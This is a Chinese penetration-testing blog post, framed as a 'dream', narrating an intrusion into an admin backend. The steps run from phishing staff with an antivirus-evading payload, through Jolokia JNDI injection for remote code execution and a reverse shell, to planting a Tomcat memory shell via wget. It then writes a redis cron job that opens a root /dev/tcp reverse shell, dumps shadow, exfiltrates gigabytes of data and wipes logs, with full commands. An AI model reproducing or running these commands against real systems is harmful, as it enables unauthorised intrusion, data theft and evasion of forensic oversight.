重生之我是赏金猎人(五)-梦中绝杀某脖代理商后台

0x00 前言

如有技术交流或渗透测试/代码审计/红队方向培训/红蓝对抗评估需求的朋友

欢迎联系QQ/VX-547006660

前两天在国企的朋友遇到了一个棘手的靶标,听说之前没人能从外网打点进去,只能靠万里防火墙取证

我一听来了兴趣,在梦中臆造了一个靶场进行渗透,并且该梦境已获得相关授权

还请各位看官请勿对号入座,如有雷同,纯属巧合

0x01 钓鱼打点

官网发现了客服联系方式

image-20220316104511285

通过修改 shellcode特征的CS + 免杀加载器,直接做出免杀🐴。

改后缀名为非exe(懂的都懂),直接用话术钓鱼客服(现在客服都聪明了,直接exe是肯定钓不到的),获得其桌面记事本

记事本中翻出来了后台地址,但是并没有账号密码(有也没有用,因为有Google验证码)

http://xxxxx/xxxxx-admin/

image-20220316105840446

0x02 FUZZ得到Spring Actuator泄露,并分析信息

FUZZ了一下,出了二级目录Spring Actuator的泄露

http://xxxxx/xxxxx-admin/actuator/

发现了老朋友jolokia

image-20220314225017970

jolokia组件,熟悉Spring测试的兄弟都知道,不出意外可以直接秒~

又访问了几个常见的端点

http://xxxxx/xxxxx-admin/actuator/env

通过env端点可知,该后台托管在亚马逊云,并且没有泄露ak,sk等信息

翻来覆去,只看到有个redis的密码

image-20220316103343362

看了下beans端点,并没有找到能用来直接dump出星号密码的合适Mbean,所以放弃直接通过jolokia调用mbean获取明文

image-20220316120045893

http://xxxxx/xxxxx-admin/actuator/heapdump

通过下载heapdump,进入Mat分析

select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))

image-20220316111928566

调试后发现redis配置的链接地址是127.0.0.1,密码为空,但是并没有开放端口外链,那只能先留着了

0x03 Jolokia Realm JNDI注入 rce

https://xxxx/xxxxx-admin/actuator/jolokia/

根据得到jolokia端点

直接RCE打试试

利用条件为:

  • 目标网站/jolokia/list 接口存在 type=MBeanFactory 和 createJNDIRealm 关键词
  • 请求可出外网

命令编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html

编码反弹Shell的命令

image-20220314225702388

用JNDI-Injection-Exploit直接起个恶意Rmi服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "command" -A vps_ip

image-20220316105555152

直接修改好脚本

https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-realm-jndi-rce.py

image-20220314231220102

image-20220314232723932

运气不错,目标出网,直接秒了

image-20220316120905094

image-20220315000605462

www权限

image-20220316122240804

0x04反弹shell后的取证

history,last、hosts,中间件日志等常规取证就不说了

目标的运维还是比较谨慎的,没有直连,而是以一台亚马逊云的主机为跳板进行SSH链接

image-20220316123029874

进程看了一下,web程序用的是MVC架构

image-20220316122758785

0x05 注入内存🐴

为了防止反弹的Shell随时GG,所以选择注个内存马到Tomcat

比较恶心的是目标用的MVC架构,路由默认都是直接302跳转后台的路由,导致不少内存马没法直接用,时间紧急,去Git翻了一个

https://github.com/WisteriaTiger/JundeadShell

直接受控机梭哈

wget x.x.x.x:50000/agent_starter.jar

nohup java -jar agent_starter.jar "java_process_name" 8 &

挂上Burp访问靶标,找到了个不302跳转的接口,加上密码,访问内存马成功

image-20220316124212144

0x06 借用redis权限提升

目标为www权限,而且用的亚马逊云,及时打了补丁,最近的番号pkexec,dirty pipe等测试后不好使,脏牛等老古董更不行

GUID,SUID查了一遍,没有误配

最后都快放弃的时候看了一眼进程,redis是以root权限运行的...天助我也

image-20220316143058190

直接通过端口转发程序把redis的端口转发到本地

利用redis写计划任务

(PS:Ubuntu下会因为夹杂了脏数据导致语法无法识别而任务失效;但对于centos系统则没有影响,可以成功被利用,靶标为centos)

echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/xx.xx.xx.xx/4444 0>&1\n\n"|redis-cli -h xx.xx.xx.xx -x set 1 #设定值
redis-cli -h xx.xx.xx.xx config set dir /var/spool/cron/
redis-cli -h xx.xx.xx.xx config set dbfilename root
redis-cli -h xx.xx.xx.xx save

nc监听本地,没过一会,root权限的shell就弹回来了

image-20220316140326981

随后又把shadow导出,取证了root用户目录下的部分东西,做了部分权限维持

0x07 文件取证资料回传

把取证好的网站Jar包,目录日志,登陆日志打包好,足足有几个G,回传文件成了难事

tar -cvf xxxx.tar *

尝试了nc,后门回传等均不稳定中途回传断掉,自己的oss那时候也过期了,没法通过oss回传,难受的一逼..

最终问了下小圈里的师傅,提供了一个好用的思路

利用奶牛快传回传文件

https://github.com/Mikubill/cowtransfer-uploader

nohup ./cowtransfer-uploader -c "remember-mev2=...;" -a "<cow-auth-token>" xxx.tar

速度很舒服,大概上传速度能到每秒6M

![image-20220316151652403](/Users/j0o1ey/Library/Application Support/typora-user-images/image-20220316151652403.png)

随后直接去自己的奶牛快传下载即可

0x08 资料分析

把回传回来的jar包反编译,取证其中的数据库链接信息,等待下步指示

image-20220316153837863

分析程序记录的Log日志,后台登陆信息、账号、登陆IP尽收眼底;站在暗处的违法分子命不久矣

image-20220316154212116

0x09 擦屁股与后言

随后把web当日日志,history,/var/log下的日志全部清理干净

用到的工具全部wipe删掉

断掉shell链接的一瞬间,我醒了,发现这一切竟是我在做梦

posted @ 2022-03-19 13:28  J0o1ey  阅读(722)  评论(0编辑  收藏  举报